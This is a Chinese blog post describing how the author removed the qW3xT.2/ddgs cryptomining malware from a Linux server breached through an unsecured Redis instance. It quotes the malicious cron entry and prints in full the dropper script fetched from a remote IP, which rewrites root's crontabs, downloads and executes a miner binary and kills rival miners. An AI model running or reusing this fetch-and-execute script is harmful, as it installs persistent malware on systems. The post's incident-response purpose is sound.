Linux 下qW3xT.2，解决挖矿病毒

早上开启电脑，连接服务器，使用top查看cpu状态。结果显示进程占用cpu99%以上。

在网上百度，了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法：

1、首先解决redis入口问题，因为最开始没有设置密码，所以首先修改redis.conf。设置密码，然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件，删除。之后kill掉qW3xT.2该进程，但是一段时间之后，发现该行程又重新启动。

肯定是有守护进程，观察top命令下的进程，发现一个可疑的进行

3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时，首先删除qW3xT.2文件和ddgs.3013文件，然后使用top查询qW3xT.2和ddgs.3013的pid，直接kill掉。

4、一段时间之后，删除的文件重新生成，dds和挖矿的进程又重新执行。此时怀疑是否有计划任务，此时查看计划任务的列表

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh[root@iZbp1cbg04oh74k1dexpujZ tmp]#  crontab -r   //删除计划任务

curl 的这几个 optional 介绍,我也是百度的
-f - fail在HTTP错误（H）上静默失败（根本没有输出）
-s -silent静音模式。不要输出任何东西
–socks4 HOST [：PORT]给定主机+端口上的SOCKS4代理
–socks4a HOST [：PORT]给定主机+端口上的SOCKS4a代理
–socks5 HOST [：PORT]给定主机+端口上的SOCKS5代理
–socks5-hostname HOST [：PORT] SOCKS5代理，将主机名传递给代理
–socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称
–socks5-gssapi-nec与NEC SOCKS5服务器的兼容性
-S –show-error显示错误。使用-s时，make curl会在出现错误时显示错误
-L –location遵循重定向（H）
–location-trusted like –location并将auth发送给其他主机（H）

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

计划任务删除完成之后，这个13又开始运行。太顽固了。
于是我又看计划任务的内容，是否是有东西没有删除干净。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; thencurl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

发现计划任务在服务器中创建了几个文件，
/var/spool/cron/crontabs/root
/var/spool/cron/root
内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。（与计划任务相同）
将计划任务中创建的文件删除。

最终，这个挖矿病毒终于删除完成

Linux 下qW3xT.2，解决挖矿病毒相关推荐

qW3xT.6解决挖矿病毒 - 云服务器被植入挖矿脚本成为矿机
## qW3xT.6解决挖矿病毒 - 云服务器被植入挖矿脚本成为矿机 > 之前由于goblog应用因为不知名问题导致程序crash,之前只检查过云服务内存的情况,但是其他信息暂未检查,今天远程到 ...
Linux被kdevtmpfsi，pnscan挖矿病毒入侵记录
Linux被kdevtmpfsi,pnscan挖矿病毒入侵记录起因从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告.登陆平台后发现站内信好在腾讯没 ...
初步解决挖矿病毒xmrig cpu miner
初步解决挖矿病毒xmrig cpu miner 本人初学者,前段时间写了个爬虫,暴露了ip,服务器受到攻击,被植入了木马,后来就发现中了这个挖矿病毒.之前曾经解决过,是把任务管理器中杂七杂八的进程都结 ...
Linux下LCD自动关闭解决方法，一般就自动十分钟黑屏的原因
Linux下LCD自动关闭解决方法主机环境:Gentoo Linux 11.2 内核版本:Linux Kernel 3.2.1 原创作品,转载请表明http://blog.csdn.net/ymin ...
qW3xT.2，解决挖矿病毒。
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置. 在晚上一点左右.阿里云给我发短信,告诉我服务器出现紧急安全事件.建议登录云盾-态势感知控制台查看详情和处理. 于 ...
linux解决挖矿病毒
今天线上服务器被黑客攻击中挖矿病毒,打了阿里云售后电话解决了,现记录一下 1.用top命令查看进程 top 2.查看可疑的进程,我的进程名字是kdevtmpfsi 杀死该进程 kill -9 pid ...
解决挖矿病毒（定时任务、计划任务、系统定时器、定时启动、crontab、入侵）
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置. 在晚上一点左右.阿里云给我发短信,告诉我服务器出现紧急安全事件.建议登录云盾-态势感知控制台查看详情和处理. 于 ...
解决挖矿病毒占用cpu以及误删 ld-linux-x86-64.so.2 文件的问题
上次已经被抓去挖矿了当了一次旷工了,本以为解决了,没想到竟然死灰复燃. 这次占用cpu的依然是一个ld-linux的进程,kill掉之后同样就查了关于test用户的进程,果然,test用户的进程有10 ...
记一次解决挖矿病毒的过程（sysupdate、networkservice）
对于挖矿病毒,我们如何发现它呢?其实有个很显然的问题,挖矿病毒会超级占用cpu,当你发现你的服务器变的很卡的时候,这时候,可能就是挖矿病毒或者其他病毒正在攻击你的服务器. 我也是有一段时间服务器变的很 ...

Linux 下qW3xT.2，解决挖矿病毒

Linux 下qW3xT.2，解决挖矿病毒相关推荐

最新文章

热门文章